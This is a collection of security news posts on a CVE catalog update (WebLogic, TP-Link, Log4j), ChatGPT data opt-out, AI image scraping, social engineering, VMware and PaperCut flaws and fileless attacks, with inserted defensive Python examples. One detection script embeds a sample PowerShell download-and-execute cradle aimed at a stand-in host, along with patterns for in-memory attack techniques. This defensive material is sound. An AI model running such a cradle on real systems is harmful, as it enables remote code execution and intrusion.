IT NEWS

Oracle WebLogic Server vulnerability added to CISA list as “known to be exploited”

On May 1, 2023 the Cybersecurity and Infrastructure Security Agency (CISA) added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

This means that Federal Civilian Executive Branch (FCEB) agencies are obliged to remediate the vulnerabilities by May 22, 2023. For the rest of us it means “pay attention”: anyone else with a vulnerable system should remediate as fast as possible too.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs added by CISA were:

  • CVE-2023-1389 is a vulnerability in TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Affected versions contain a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
  • CVE-2021-45046 is a very old Apache Log4j2 deserialization of untrusted data vulnerability that still works on enough unpatched servers to be listed.
  • CVE-2023-21839 affects Oracle WebLogic Server. It can lead to an unauthenticated attacker with network access gaining unauthorized access to “critical data or complete access to all Oracle WebLogic Server accessible data.”

We would like to zoom in on that last vulnerability for a few reasons.

  • First of all, because Oracle WebLogic is a very widespread Java application server and has always been a popular entrance to networks for cybercriminals.
  • The vulnerability is easily exploitable, even for copycats, since proof-of-concepts (PoCs) are available and exploits have been incorporated into pen-testing tools.
  • The scope of the vulnerability. There is a real risk that a remote, unauthenticated attacker can fully compromise the server in order to steal confidential information, install ransomware, and pivot to the rest of the internal network.

Oracle WebLogic Suite is an application server for building and deploying enterprise Java EE applications which is fully supported on Kubernetes. That makes it easy to use on-premises or in the cloud. The companies using Oracle WebLogic are most often found in the United States and in the Information Technology and Services industry.

In Oracle’s January security advisory you will notice that five researchers are credited with finding and reporting CVE-2023-21839. This may be due to the fact that Oracle issues patches in a quarterly cycle, where many others publish updates monthly. This means that researchers have more time to find new vulnerabilities, but they also have to keep quiet about them for longer. Nevertheless, five separate instances could indicate that this vulnerability was not hard to find.

What’s even worse is that the vulnerability is easy to exploit. The published exploits target the Listen Port for the Administration Server. The protocol used with this port is T3—Oracle’s proprietary Remote Method Invocation (RMI) protocol, which transfers information between WebLogic servers and other Java programs. An unauthenticated attacker with remote access can send a crafted request to a vulnerable WebLogic server and upload a file via an LDAP server, which basically allows the attacker to obtain a reverse shell on the target. A reverse shell or “connect-back” shell opens communications with the attacker and allows them to execute commands, which enables them to take control of the system.

Update now

Affected versions of Oracle WebLogic Server are 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. A patch for this vulnerability is available on the Oracle support site for those that have an Oracle account.

Oracle always strongly recommends that you do not expose non-HTTPS traffic (T3/T3s/LDAP/IIOP/IIOPs) outside of the external firewall. You can control this access using a combination of network channels and firewalls.
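The advice above boils down to a verifiable property: none of the T3/T3s/LDAP/IIOP/IIOPs listeners should be reachable from outside the external firewall. As an added example (not code from the article or from Oracle), the routine below checks a connection log for exactly that, reporting accepted connections to those protocols from addresses outside the trusted networks. The key=value log layout, the sample lines and the choice of RFC 1918 space as "trusted" are all assumptions constructed for this example; substitute your own log format and address plan.

```python
"""
Added example: flag WebLogic non-HTTPS protocol connections (T3, T3s, LDAP,
IIOP, IIOPs) that were accepted from outside the trusted networks.
Log format and sample lines are constructed for this example.
"""
import ipaddress
from typing import Dict, List, Optional, Sequence

# Protocols Oracle says should not be exposed outside the external firewall.
NON_HTTPS_PROTOCOLS = {"t3", "t3s", "ldap", "iiop", "iiops"}

# Assumption: RFC 1918 space stands in for "inside the firewall". Replace with
# the networks that are actually allowed to talk to the admin listener.
DEFAULT_TRUSTED = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Constructed sample log in a hypothetical key=value format. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges used here as "external" addresses.
SAMPLE_LOG = """\
2023-05-02T10:15:01Z src=10.20.30.40 dst=10.0.0.5 dport=7001 proto=t3 action=accept
2023-05-02T10:15:07Z src=203.0.113.7 dst=10.0.0.5 dport=7001 proto=t3 action=accept
2023-05-02T10:16:12Z src=198.51.100.9 dst=10.0.0.5 dport=443 proto=https action=accept
2023-05-02T10:17:44Z src=192.168.5.6 dst=10.0.0.5 dport=7002 proto=t3s action=accept
2023-05-02T10:18:03Z src=203.0.113.7 dst=10.0.0.5 dport=7001 proto=iiop action=drop
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split 'ts key=value key=value ...' into a dict; None for blank/odd lines."""
    parts = line.split()
    if len(parts) < 2:
        return None
    fields = {"ts": parts[0]}
    for kv in parts[1:]:
        if "=" in kv:
            key, value = kv.split("=", 1)
            fields[key] = value
    return fields


def is_trusted(addr: str, trusted: Sequence[ipaddress.IPv4Network]) -> bool:
    """True when addr falls inside one of the trusted networks."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # malformed address: treat as untrusted
    return any(ip in net for net in trusted)


def find_external_exposure(log_text: str, trusted=None) -> List[Dict[str, str]]:
    """Return accepted non-HTTPS WebLogic connections from untrusted sources.

    Dropped connections are not reported: they show the firewall doing its job.
    """
    trusted = DEFAULT_TRUSTED if trusted is None else trusted
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields or fields.get("action") != "accept":
            continue
        if fields.get("proto", "").lower() not in NON_HTTPS_PROTOCOLS:
            continue
        if is_trusted(fields.get("src", ""), trusted):
            continue
        hits.append(fields)
    return hits


if __name__ == "__main__":
    for hit in find_external_exposure(SAMPLE_LOG):
        print(f"EXPOSED: {hit['proto']} on port {hit['dport']} accepted from {hit['src']} at {hit['ts']}")
```

On the sample above only the accepted T3 connection from 203.0.113.7 is reported; the HTTPS connection from outside is expected traffic, and the dropped IIOP attempt shows the firewall rule working. Run it over real firewall or network-channel logs, with the trusted list adjusted, before and after applying the patch.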


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

How to keep your ChatGPT conversations out of its training data

Last week, OpenAI announced it had given ChatGPT users the option to turn off their chat history. ChatGPT is a “generative AI”, a machine learning algorithm that can understand language and generate written responses. Users can interact with it by asking questions, and the conversations users have with it are in turn stored by OpenAI so they can be used to train its machine learning models. This new control feature allows users to choose which conversations to use to train OpenAI models.

“Conversations that are started when chat history is disabled won’t be used to train and improve our models, and won’t appear in the history sidebar,” the company said in the announcement. “When chat history is disabled, we will retain new conversations for 30 days and review them only when needed to monitor for abuse, before permanently deleting.”

Prior incidents involving ChatGPT may have prompted these changes. Early this month, reports revealed Samsung employees had erroneously shared confidential company information with ChatGPT. Before this, OpenAI took ChatGPT offline after it exposed some chat histories to others using the tool at the same time. This incident earned the attention of a data protection agency in Italy, which then ordered a temporary ban for the AI, pending an investigation.

Along with its announcement, OpenAI also revealed a ChatGPT Business subscription that will keep users’ input out of its training data. “ChatGPT Business will follow our API’s data usage policies, which means that end users’ data won’t be used to train our models by default,” the company said.

How to opt out of OpenAI’s training data

Log in to ChatGPT and click the three dots next to your name to open a menu.

ChatGPT hamburger menu button

Choose Settings from the menu.

ChatGPT menu

The Settings menu will appear in the middle of the screen. Click Show next to Data Controls to expand the window, and then toggle the switch next to Chat History & Training to the off position to stop your data being used to train ChatGPT.

Users can also export their chat history for local storage by clicking the Export data text in the expanded Settings window. Users will receive an email with a button link to the file containing all of their conversations.

ChatGPT settings menu

Note that disabling Chat History & Training also turns off ChatGPT’s conversation history feature. Chats created after disabling the option won’t appear in the history sidebar, but cached conversations found in the sidebar of the page remain.

ChatGPT chat history is off


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Upcoming webinar: Is EDR or MDR better for your business?

Don’t miss our upcoming webinar on EDR vs. MDR!

In the webinar, Marcin Kleczynski, CEO and co-founder of Malwarebytes, and guest speaker Joseph Blankenship, Vice President and research director at Forrester, discuss topics such as:

  • The difference between EDR and MDR, how EDR solutions can be challenging for businesses without dedicated security teams, and why building an in-house SOC can be expensive and difficult.
  • The limitations of Endpoint Protection and EDR, specifically when it comes to advanced threats like ransomware that use Living off the Land (LOTL) attacks and fileless malware.
  • How MDR providers work with clients to understand their security technology stack, make recommendations, and agree on response actions to take.
  • Whether EDR or MDR is better for your business based on the resources you have available and the level of security you require.

Want to learn more about EDR and MDR and which is right for your business? Be sure to catch the full webinar on Wednesday, May 10, 2023 at 10 am PT / 1 pm ET and get valuable insights from industry experts on how to improve your security operations and protect against ransomware and fileless malware.

Register now!

Read also:

How to choose an MDR vendor: 6 questions to ask

Is an outsourced SOC worth it? Looking at the ROI of MDR

Cyber threat hunting for SMBs: How MDR can help

Is it OK to train an AI on your images, without permission?

Website owners are once again at war with tools designed to scrape content from their sites. An AI scraper called img2dataset is scouring the Internet for pictures that can be used to train image-generating AI tools.

These generators are increasingly popular text-to-image services, where you enter a suggestion (“A superhero in the ocean, in the style of Van Gogh”) and it produces a visual to match. Since the system’s “understanding” of images is a direct result of what it was trained on, there is an argument that what it produces consists of bits and pieces of all that training data. There’s a good chance there may be legal issues to consider, too. This is a major point of contention for artists and creators of online content generally. Visual artists don’t want their work being sucked up by AI tools (that make someone else money) without permission.

Unfortunately for the French creator of img2dataset, website owners are very much dissatisfied with his approach to harvesting images.

The free program “turns large sets of image URLs into an image dataset”. It’s claimed the tool can “download, resize, and package 100 million URLs in 20 hours on one machine”. That’s a lot of URLs.

What’s aggravating site owners is that the tool is ignoring assumed good netiquette rules. Way back in 1994, “robots.txt” was created as a polite way to let crawlers know which bits of a website they were allowed to pay a visit to. Search engines could be told “Yes please”. Other kinds of crawlers could be told “No thank you”. Many rogues would simply ignore a site’s robots.txt file, and end up with a bad reputation as a result.

This is one of the main complaints where img2dataset is concerned. Website owners contend that it’s not practical to have to tell every tool in existence that they wish to opt out. Rather, the tool should be opt-in. This is a reasonable concern, especially as site owners would essentially be responsible for adding ever more entries to their configuration on a daily basis.

One site owner had this to say, in a mail sent to Motherboard:

I had to pay to scale up my server, pay extra for export traffic, and spent part of my weekend blocking the abuse caused by this specific bot.

Elsewhere, you can see a deluge of complaints from site owners on the tool’s “Issues” discussion page. Issues of consent, custom headers, even talk of the creator being sued: It’s chaos over there.

If you’re a site owner who isn’t keen on img2dataset paying a visit, there are a number of ways you can tell it to keep a respectful distance. From the opt-out directives section:

Websites can use these HTTP headers: “X-Robots-Tag: noai”, “X-Robots-Tag: noindex”, “X-Robots-Tag: noimageai”, and “X-Robots-Tag: noimageindex”. By default, img2dataset will ignore images with such headers.

However, the FAQ also says this for users of the img2dataset tool:

To disable this behaviour and download all images, you may pass “--disallowed_header_directives '[]'”

This does exactly what it suggests, ignoring the “please leave me alone” warning and grabbing all available images. It’s no wonder, then, that website owners are currently so hot and bothered by this latest slice of website scraping action. With little apparent interest in robots.txt from the creator, and workarounds to ensure users can grab whatever they like, this is sure to rumble on.
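To make the opt-out mechanism concrete, here is an added example (not img2dataset’s own code) of how a crawler that honours the directives quoted above decides whether to skip an image, together with the header a site owner can send. The parsing details (comma-separated directives, an optional “useragent:” prefix) are assumptions about the general X-Robots-Tag syntax, not a description of img2dataset’s implementation; passing an empty disallowed list reproduces the effect of the “--disallowed_header_directives '[]'” override from the FAQ.

```python
"""
Added example: honour X-Robots-Tag opt-out directives the way a well-behaved
image crawler would. Parsing rules are assumptions about the general header
syntax, not img2dataset's code.
"""
from typing import Iterable, List, Sequence, Set, Tuple

Header = Tuple[str, str]

# The four directives the img2dataset FAQ says it respects by default.
AI_OPT_OUT_DIRECTIVES: Sequence[str] = ("noai", "noindex", "noimageai", "noimageindex")


def parse_x_robots_tag(headers: Iterable[Header]) -> Set[str]:
    """Collect lower-cased directives from every X-Robots-Tag header present.

    The header may repeat and may carry several comma-separated directives.
    A bare "useragent:" prefix (e.g. "googlebot: noindex") is dropped here;
    that is an assumption, not something the FAQ spells out.
    """
    directives: Set[str] = set()
    for name, value in headers:
        if name.lower() != "x-robots-tag":
            continue
        body = value
        head, sep, rest = body.partition(":")
        if sep and "," not in head and " " not in head.strip():
            body = rest
        for token in body.split(","):
            token = token.strip().lower()
            if token:
                directives.add(token)
    return directives


def should_skip_image(headers: Iterable[Header],
                      disallowed: Sequence[str] = AI_OPT_OUT_DIRECTIVES) -> bool:
    """True when the response carries any directive the crawler is told to honour.

    An empty `disallowed` sequence means nothing is ever skipped, which is the
    effect of the '[]' override described in the FAQ.
    """
    found = parse_x_robots_tag(headers)
    return any(directive.lower() in found for directive in disallowed)


def opt_out_headers() -> List[Header]:
    """Headers a site owner can attach to image responses to signal the opt-out."""
    return [("X-Robots-Tag", "noai, noimageai")]


if __name__ == "__main__":
    # Constructed response headers for a single image.
    response = [("Content-Type", "image/jpeg")] + opt_out_headers()
    print("skip with default directives:", should_skip_image(response))
    print("skip with '[]' override:", should_skip_image(response, disallowed=()))
```

The second print shows the problem the article describes: the opt-out only works while the crawler operator chooses to honour it, so a site owner who wants a hard guarantee still has to block the traffic at the server or firewall rather than rely on the header. In nginx the header itself is one `add_header X-Robots-Tag "noai, noimageai";` line in the location that serves images.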


A week in security (April 24-30)

Last week on Malwarebytes Labs:


How to protect your small business from social engineering

When Alvin Staffin received an email from his boss, he didn’t question it. In the email, Gary Bragg, then-president of Pennsylvania law firm O’Neill, Bragg & Staffin, asked Staffin to wire $580,000 to a Bank of China account. Staffin, who was VP and in charge of banking, sent the money through as asked. An hour later, he realized the request was fraudulent—he hadn’t been contacted by Bragg at all.

A hacker had gained access to Bragg’s email account and used it, along with information they’d learned about an ongoing loan transaction, to pose as Staffin’s boss. Nothing in the exchange made Staffin suspect that something was off until he called Bragg, who was out of town at the time, to discuss the transfer.

Both Staffin and his employer were victims of business email compromise (BEC), also known as CEO fraud, a type of social engineering attack. Social engineering attacks are cyberattacks where a criminal tricks a victim into doing something against their interests, such as revealing sensitive information or making a bank transfer.

BEC is one of the most damaging forms of social engineering attacks faced by small businesses. In the 2022 Internet Crime Report, the FBI ranked it as the second most damaging fraud, in terms of financial losses, after investment fraud.

The common forms of social engineering used by criminals are pretexting, phishing, baiting, and tailgating. Pretexting involves creating a false identity and situation to trick victims into providing information or access (BEC is a form of pretexting). Phishing attacks try to trick victims into giving away sensitive information, such as login credentials, using emails and websites designed to look like they belong to a person or business the victim trusts, such as their bank. Baiting is when malware-infected devices, such as USB sticks, are left in public places, in the hope that victims will take them and use them. Lastly, tailgating is when a fraudster follows an authorized person into a restricted area without proper authorization.

Protecting your business from social engineering

Securing a small business from social engineering attacks is an ongoing effort that requires constant vigilance. Because social engineering relies on a criminal’s powers of persuasion, your staff’s vigilance is your first line of defence. Security software forms a vital second line, protecting your business from some social engineers’ tools, such as phishing sites, and from social engineering attacks designed to deliver malware.

Your first priority should be to empower employees to be confident in identifying and effectively responding to social engineering tactics.

  • Run regular training to help employees understand how to properly recognize and respond to social engineering. Consider testing your staff, too, and follow up with further education for anyone who fails the test.
  • Use at least two people for financial transactions. Social engineering attacks try to isolate and hurry staff so they act without thinking. Create checks in your processes to prevent that.
  • Create an intentional culture of security so that security practices come naturally to your staff. Encourage people to report suspicious activity sooner rather than later, avoid punishing staff who fall for social engineering so that others are not afraid to be accountable, and lead by example.
  • Use endpoint security to protect against the effects of baiting attacks, to block phishing sites, and to detect malware delivered by social engineering.
  • Monitor threat intelligence to understand current and emerging threats that could affect your business.


Microsoft: You’re already using the last version of Windows 10

Microsoft issued a client roadmap update on Thursday to remind us once again that Windows 10 support is slowly coming to an end. In less than three years, all Windows 10 users will need to have moved to Windows 11. While moving to Windows 11 should be a win for security, some Windows 10 fans may be a little nervous. Upgrading isn’t always straightforward, and exacting hardware requirements weigh heavily on Windows 11.

According to the update, the company intends the current version of Windows 10, version 22H2, to be the last edition of the operating system (OS). That means no more new and significant features for Windows 10. Instead, interesting changes and enhancements will be incorporated into Windows 11. PCMag highlighted that this process is already underway.

Microsoft will continue to release monthly security updates for Windows 10 until October 14, 2025. After that, it will officially pull the plug for consumer users but not for organizations signed up to the Long Term Servicing Channel. Support for them will extend beyond the deadline for up to 10 years. From Microsoft’s description:

The Long-Term Servicing Channel (LTSC) is designed for Windows 10 devices and use cases where the key requirement is that functionality and features don’t change over time. Examples include medical systems (such as those used for MRI and CAT scans), industrial process controllers, and air traffic control devices. We designed the LTSC with these types of use cases in mind, offering the promise that we will support each LTSC release for 10 years, and that features and functionality will not change over the course of that 10-year lifecycle.

Microsoft recommends Windows 10 users switch to Windows 11 if they haven’t already done so. Despite that, Windows 10 remains hugely popular, with a 69 percent share of Windows desktops, globally. Windows 11 trails significantly with just 18 percent, not far off Windows 7, which still accounts for nine percent.

Windows 11’s low numbers may soon change as the sunset date approaches, which would be good news for security. Microsoft’s latest OS makes multiple improvements over what’s available in Windows 10. Microsoft’s approach has been to create a chain of trust that ensures the integrity of the entire hardware and software stack, from the ground up. Many of the links in that chain rely on Virtualization Based Security (VBS), a technology that creates secure sandboxes isolated from the main OS. Doing that requires hardware-based virtualization features, which is why Windows 11 has such stringent hardware requirements.

Windows 11 also includes a more efficient way of warding off phishing attacks; warnings when users type passwords into notepad files and other programs; and a default account lockout policy to combat the dangers of Remote Desktop Protocol (RDP) brute force attacks, an automated attack wherein hackers try to guess a user’s password remotely, over RDP.

And, soon, Windows 11 will allow app developers to tap into its built-in human presence detection (HPD) capabilities to create and share unique experiences. HPD is a new feature that allows touch-free logins of laptops. It also automatically locks the device when a user walks away from it, giving them much-needed privacy. Of course, this feature can only be used if your laptop has the hardware to support it.


Update now: Critical flaw in VMWare Fusion and VMWare Workstation

Four vulnerabilities in virtualisation software have been fixed by VMware, including two which were exploited at the 2023 Pwn2Own contest. Three have been given the severity rating “Important”, while the last (CVE-2023-20869) is classed as “Critical”.

The four vulnerabilities are:

  • CVE-2023-20869 is a “Critical” flaw that affects Fusion and Workstation. It is a stack-based buffer overflow issue in the functionality for sharing host Bluetooth devices with the virtual machine. As per the advisory, “A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host.” Needless to say, guest VMs are not supposed to be able to make the host machines they’re running on do things.
  • CVE-2023-20870 is an “Important” flaw that affects Fusion and Workstation. It’s another issue in the functionality for sharing host Bluetooth devices, but with this one an attacker can potentially read privileged information stored in the virtual machine’s hypervisor memory.
  • CVE-2023-20871 is an “Important” flaw that only affects Fusion. It allows an attacker who has read / write access to the host operating system to elevate their privileges to gain root access to the host operating system.
  • CVE-2023-20872 is an “Important” flaw that affects Fusion and Workstation. It allows virtual machines with a physical CD/DVD drive attached to execute code on the hypervisor, if the drive is configured to use a virtual SCSI controller.

Workarounds and updates

All four issues can be addressed by updating to the latest version of the affected software. At the time of writing these are VMware Fusion 13.0.2 and VMware Workstation 17.0.2. Workarounds are available for CVE-2023-20869, CVE-2023-20870, and CVE-2023-20872.

CVE-2023-20869 and CVE-2023-20870 can be mitigated by turning off Bluetooth support by unchecking the “Share Bluetooth devices with the virtual machine” option. The relevant support documents for each product are VMware Workstation Pro, VMware Workstation Player, and VMware Fusion.

CVE-2023-20872 can be mitigated by removing the CD/DVD device from the virtual machine. Alternatively, you can configure the virtual machine so that it does not use a virtual SCSI controller. After shutting down the virtual machine, the steps are:

To remove the CD/DVD device in VMware Workstation:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD and click Remove

To remove the CD/DVD device in VMware Fusion:

  • Select a virtual machine in the Virtual Machine Library window
  • Click on Virtual Machine menu
  • Click Settings
  • Under Removable Devices in the Settings window, select CD/DVD > Advanced Options > Remove CD/DVD Drive.

To configure VMware Workstation not to use a virtual SCSI controller:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD > Advanced > CD/DVD Advanced Settings > Virtual device node
  • You can configure the Bus type

To configure VMware Fusion not to use a virtual SCSI controller:

  • Select a virtual machine in the Virtual Machine Library window
  • Click on Virtual Machine menu
  • Click on Settings
  • Under Removable Devices in the Settings window, select CD/DVD > Advanced options > Bus type
  • You can configure the Bus type.


LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities

A few days ago we wrote about two vulnerabilities found in PaperCut application servers. As we noted, exploitation was fairly simple so there was some urgency to install the patches. My esteemed colleague Chris Boyd literally wrote:

“Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit.”

As it turns out, there are already two flavors of ransomware preying on those that haven’t updated yet.

A Cl0p affiliate, branded as DEV-0950 by Microsoft, has already incorporated the PaperCut exploits into its attacks. This affiliate has also been known to use the GoAnywhere zero-day that basically brought Cl0p back from the dead last month.

In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.

Known ransomware attacks in March 2023, listed by gang

But don’t rule the habitual frontrunner LockBit out just yet. Microsoft Threat Intelligence said in a tweet that it’s “monitoring other attacks also exploiting these vulnerabilities, including intrusions leading to Lockbit deployment.”

PaperCut is print management software that works by intercepting print jobs as they pass into a print queue. It’s used by large companies, state organizations, and educational institutions because it is compatible with all major printer brands and platforms. This makes a vulnerability, especially one that is this easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone that is running an unpatched server.

Both underlying vulnerabilities have been addressed with patches. If you update your PaperCut application servers, you are no longer at risk. From the Updating FAQ:

  • Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
  • If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade, PaperCut advises the following:

  • Block all inbound traffic from external IPs to the web management port (ports 9191 and 9192 by default)
  • Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
  • Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Fileless attacks: How attackers evade traditional AV and how to stop them

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks—and while they can be bad, they’re nothing compared to their fileless cousins.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done but rather in-memory execution, which helps them evade detection by conventional security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks that execute the payload from the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly in memory instead of from the hard drive has several benefits, such as:

  • Evasion of traditional security measures: Fileless attacks bypass antivirus software and file signature detection, making them difficult to identify using conventional security tools.
  • Increased potential for damage: Since fileless attacks can operate more stealthily and with greater access to system resources, they may be able to cause more damage to a compromised system than file-based attacks.
  • Memory-based attacks can be difficult to remediate: Since fileless attacks don’t create files, they can be more challenging to remove from a system once they have been detected. This can make it extra difficult for forensics to trace an attack back to the source and restore the system to a secure state.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

LOTL attacks are any time an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly in memory. While both types of attacks often overlap, they are not synonymous.

Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute a payload in memory, but they can also do so without leveraging a legitimate system tool or process at all.

PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. Source.

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

  • PowerShell: A legitimate scripting tool that can execute malicious code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
  • Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
  • Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
  • JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
  • Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. This method takes advantage of the legitimate macro functionality, making it an example of an LOTL technique as well.

Note that in each of these instances, fileless attacks often rely on exploiting vulnerabilities in system components (such as Office or web browsers) to execute their code.

Preventing and spotting fileless attacks: Quick tips

  • Keep software and systems updated: Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
  • Regularly review security logs: Examine security logs for unusual activity or patterns that could indicate a fileless attack, such as unexpected PowerShell usage or excessive network connections.
  • Employ behavioral analytics: Use advanced threat detection tools that employ behavioral analytics to identify and block fileless attacks based on their unique behavior patterns.
  • Restrict macro usage: Limit the use of Microsoft Office macros by disabling them or allowing only digitally signed and trusted macros.
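The log-review tip above and the PowerShell and macro techniques listed earlier can be turned into concrete detection logic. The following Python is an added example, not code from this post or from Malwarebytes: it scores constructed PowerShell process-creation events for an Office parent process, an encoded command, stealth flags, and in-memory staging constructs (download cradles, reflective assembly loading). The sample events, parent paths and reason labels are all constructed.

```python
import base64
import re

# Constructed PowerShell process-creation events (not real telemetry), shaped like
# the parent-image and command-line fields an EDR or Sysmon Event ID 1 records.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Office16\WINWORD.EXE", "cmdline": "powershell.exe -nop -w hidden "
     "-EncodedCommand " + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -NoProfile -Command [Reflection.Assembly]::Load($b)"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Constructs typical of payloads staged straight into memory (download cradles,
# in-memory assembly loading) rather than written to disk first.
IN_MEMORY_PATTERNS = [
    (re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), "invoke-expression"),
    (re.compile(r"DownloadString|DownloadData|Invoke-WebRequest", re.I), "download cradle"),
    (re.compile(r"\[Reflection\.Assembly\]::Load|FromBase64String", re.I), "in-memory assembly"),
]
STEALTH_FLAGS = re.compile(
    r"-(nop|noprofile|noni|noninteractive|w(indowstyle)?\s+hidden|e(xecution)?p(olicy)?\s+bypass)\b", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event):
    """Score one PowerShell launch; returns (score, reasons) for analyst review."""
    reasons = []
    if event["parent"].split("\\")[-1].lower() in OFFICE_PARENTS:
        reasons.append("office parent spawned powershell")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded command")
    text = event["cmdline"] + " " + (decoded or "")  # scan both visible and decoded text
    if STEALTH_FLAGS.search(text):
        reasons.append("stealth flags")
    reasons += [label for pattern, label in IN_MEMORY_PATTERNS if pattern.search(text)]
    return len(reasons), reasons
```

Scoring the decoded command text as well as the visible command line is what catches the cradle hidden behind -EncodedCommand; a plain script invocation from Explorer scores zero.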

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

  • Go to Configure > Policies in Nebula.

  • Select a policy and navigate to Protection settings > Advanced settings > Anti-exploit settings.

[Image: Exploit Protection settings in a policy in Malwarebytes EDR.]

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

  • Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
